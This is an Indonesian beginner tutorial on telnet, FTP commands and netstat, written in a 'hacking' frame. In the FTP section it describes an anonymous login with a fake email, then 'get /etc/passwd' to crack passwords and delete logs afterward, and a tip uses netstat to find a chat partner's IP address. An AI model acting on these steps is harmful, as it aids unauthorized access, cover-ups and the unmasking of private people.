Jika anda mengentik “telnet target.com” maka anda terhubung ke target.com pada prot no. 23 (port yang menjalankan telnet service). Anda juga bisa terhubung ke suatu port lainnya dengan mengetik nomor port setelah target.com. sebagai contoh jika saya ingin terhubung ke port no. 25 (SMTP service) maka salya akan mengetik “telnet target.com 25”.
***********
Newbie tip: Setiap port menjalankan service tertentu. Untuk mendaptkan daftar service yang dijalankan pada port tertentu yang bukalah “C:\windows\services" pada notepad.
***********
Sesaat anda terhubung ke sebuah remote machine pada port tertentu, sebuah window popup telnet dengan daemon yang menjalankan port tersebut menunggu anda mengetikkan perintah. Sebagai contoh “telnet http://www.cyberspace.org/” maka seperti gambar dibawah inilah yang saya dapatkan.

Saya harus login disana dan mengetik suatu password dan saya mendapatkan linux shell prompt. Baiklah jika anda mengetikan newuser disana untuk mendapatkan sebuah LoginID dan Password. Dan stelah itu saya menyiapkan perintah untuk mengeksekusi secara remote.

Well, http://www.cyberspace.org/ memiliki server Linux. Jadi jika anda tidak familiar dengan Linux anda tidak akan mampu menggunakan service-nya.

4. FTP

FTP adalah File Transfer Protocol. Melalui ini anda dapat mendownload atau mengupload file. Dan apa yang hacker inginkan dari ini? Benar!! Tinggal mengeti “ftp target.com” dan daemon banner akan ditampilkan. Tapi disini, dengan tujuan menampilkan file transfer pertama kali anda harus login. Beberapa website mengijinkan adanya naonymous login. Contohnya mengetikkan login “anonymous” dan email-address anda sebagai password. Tentunya anda harus mengetikkan email palsu. Sekarang anda boleh mulai mendownload dan mengupload file. Namun untuk itu anda adanya suatu perintah. Pada FTP prompt anda dapat mengetikkan “?”. Maka akan ditampilkan sbb:

! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary globe mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir

Untuk mendaptkan bantuan pada berbagai perintah contohnya perintah delete, mengetikan “? Delete”. Beberapa perintah penting lainnya adalah:

1. 'pwd' to know the present directory at remote machine.
contohnya. ftp>pwd
/etc/home
2. 'lcd' to change the local directory.
contohnya. ftp>lcd C:\windows
local directory now C:\windows
3. 'cd' to change the remote directory.
contohnya. ftp>cd /etc
remote directory now /etc
4. 'mput' to send multiple files to remote machine.
contohnya. ftp>mput *.*
sends all files from C:\windows to /etc
5. 'mget' to get multiple files from remote machine.
contohnya. ftp>mget *.*
gets all files from /etc to C:\windows
6. 'open' to establish a connection with remote host.
contohnya. ftp>open www.target.com
7. 'bye' closes the connection and quits from ftp

Untuk perintah lainnya dari ftp silakan lihat help mereka.

Sekarang pada yang port FTP (prot 21) adalah membuka http://www.nosecurity.com/. Seorang hacker akan terhubung ke situs tersebut menggunakan “ftp http://www.nosecurity.com/” pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa http://www.nosecurity.com/ menggunakan linux server, maka hacker tersebut akan mengtikkan perintah “get /etc/apsswd” untuk mendaptkan file password dan mengcracknya. Jika anda adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.

5. netstat

Anda dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika anda ingin menentukan sebuah koneksi dengan http://www.target.com/ pada port 23 (telnet) maka port tersebut seharusnya terbuka pada http://www.target.com/. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Mengetikkan “netstat /?” pada dos prompt memberikan:

Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi –a dan –n. Opsi –a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika saya menggunakan opsi –n maka akan menunjukkan ip address sebagai ganti dari domain. Saya mendapatkan hal berikut ini jika saya mengetik “netstat –a” pada command prompt.

Active Connections

Proto Local Address Foreign Address State
TCP chintan:1027 0.0.0.0:0 LISTENING
TCP chintan:80 0.0.0.0:0 LISTENING
TCP chintan:135 0.0.0.0:0 LISTENING
TCP chintan:6435 0.0.0.0:0 LISTENING
TCP chintan:1025 0.0.0.0:0 LISTENING
TCP chintan:1026 0.0.0.0:0 LISTENING
TCP chintan:1028 0.0.0.0:0 LISTENING
TCP chintan:1309 0.0.0.0:0 LISTENING
TCP chintan:1310 0.0.0.0:0 LISTENING
TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
TCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED

”Proto” menyatakan nama protocol tersebut, “localaddress” memberikan ipaddress kita dan port yang terbuka. “Foreign Address” menyatkaan ipaddress dengan namor port yang terhubung ke kita. “State” menyatakan pernyataan saat ini jika suatu koneksi “established” atau listening atau hanya “waiting”.

Sebagai contoh jika saya membuka http://www.yahoo.com/ maka saat saya menjalankan “netstat –a” saya akan mendapatkan masukan seperti ini:

"TCP 203.43.50.81:2034 www.yahoo.com:80 ESTABLISHED"

Komputer saya dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80

*************
Newbie tip: Dengna cara ini anda bisa mendapatkan ip seseorang yang chatting dengan ada. Pertama kali jalankan “netstat –an” dan lihat dibawah foreign ip address. Sekarang mulailah private chating dengan orang lain. Juga jalankan “netstat –an” dan anda akan mendapatkan satu lagin foreign ip pada akhirnya. Inilah ip orang tersebut.
*************